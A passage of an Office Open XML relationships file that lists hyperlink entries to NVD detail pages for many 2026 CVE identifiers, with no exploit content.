Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64376" TargetMode="External" Id="rId4619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6554" TargetMode="External" Id="rId4620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68514" TargetMode="External" Id="rId4621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId4622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId4623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId4624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId4625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId4626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId4627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId4628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId4629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId4630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId4631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId4632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId4633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId4634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId4635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId4636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId4637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId4638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId4639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId4640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId4641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId4642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId4643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId4644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId4645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId4646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId4647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId4648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId4649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId4650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId4651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId4652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId4653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId4654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId4655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId4656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId4657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId4658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId4659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId4660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId4661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId4662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId4663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId4664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId4665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId4666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId4667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId4668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId4669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId4670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId4671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" TargetMode="External" Id="rId4672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70592" TargetMode="External" Id="rId4673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId4674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71441" TargetMode="External" Id="rId4675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId4676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId4677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId4678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId4679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId4680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId4681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73973" TargetMode="External" Id="rId4682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73974" TargetMode="External" Id="rId4683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77159" TargetMode="External" Id="rId4684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId4685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId4686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId4687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId4688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78487" TargetMode="External" Id="rId4689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId4690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId4691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79694" TargetMode="External" Id="rId4692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId4693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79945" TargetMode="External" Id="rId4694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79947" TargetMode="External" Id="rId4695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79975" TargetMode="External" Id="rId4696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80054" TargetMode="External" Id="rId4697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80056" TargetMode="External" Id="rId4698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80057" TargetMode="External" Id="rId4699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80058" TargetMode="External" Id="rId4700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80124" TargetMode="External" Id="rId4701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId4702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId4703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80167" TargetMode="External" Id="rId4704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80178" TargetMode="External" Id="rId4705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId4706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId4707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId4708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId4709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId4710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId4711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId4712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId4713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId4714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId4715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId4716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId4717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId4718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId4719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId4720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId4721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId4722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId4723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82193" TargetMode="External" Id="rId4724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82194" TargetMode="External" Id="rId4725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82547" TargetMode="External" Id="rId4726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId4727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId4728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId4729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId4730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85381" TargetMode="External" Id="rId4731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85399" TargetMode="External" Id="rId4732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85517" TargetMode="External" Id="rId4733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85522" TargetMode="External" Id="rId4734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85636" TargetMode="External" Id="rId4735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85637" TargetMode="External" Id="rId4736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85638" TargetMode="External" Id="rId4737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85701" TargetMode="External" Id="rId4738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85702" TargetMode="External" Id="rId4739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85703" TargetMode="External" Id="rId4740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId4741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86159" TargetMode="External" Id="rId4742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86160" TargetMode="External" Id="rId4743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86161" TargetMode="External" Id="rId4744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86162" TargetMode="External" Id="rId4745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86168" TargetMode="External" Id="rId4746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86179" TargetMode="External" Id="rId4747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86180" TargetMode="External" Id="rId4748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86183" TargetMode="External" Id="rId4749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86208" TargetMode="External" Id="rId4750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86209" TargetMode="External" Id="rId4751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86210" TargetMode="External" Id="rId4752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86211" TargetMode="External" Id="rId4753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86213" TargetMode="External" Id="rId4754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86214" TargetMode="External" Id="rId4755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86217" TargetMode="External" Id="rId4756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86220" TargetMode="External" Id="rId4757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86221" TargetMode="External" Id="rId4758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86222" TargetMode="External" Id="rId4759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86223" TargetMode="External" Id="rId4760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86224" TargetMode="External" Id="rId4761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86225" TargetMode="External" Id="rId4762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86237" TargetMode="External" Id="rId4763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86239" TargetMode="External" Id="rId4764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86260" TargetMode="External" Id="rId4765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86261" TargetMode="External" Id="rId4766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86262" TargetMode="External" Id="rId4767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86263" TargetMode="External" Id="rId4768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86268" TargetMode="External" Id="rId4769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86272" TargetMode="External" Id="rId4770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86273" TargetMode="External" Id="rId4771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86274" TargetMode="External" Id="rId4772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86275" TargetMode="External" Id="rId4773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86276" TargetMode="External" Id="rId4774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86277" TargetMode="External" Id="rId4775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86280" TargetMode="External" Id="rId4776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86282" TargetMode="External" Id="rId4777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86284" TargetMode="External" Id="rId4778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86290" TargetMode="External" Id="rId4779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86292" TargetMode="External" Id="rId4780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86293" TargetMode="External" Id="rId4781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86295" TargetMode="External" Id="rId4782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86298" 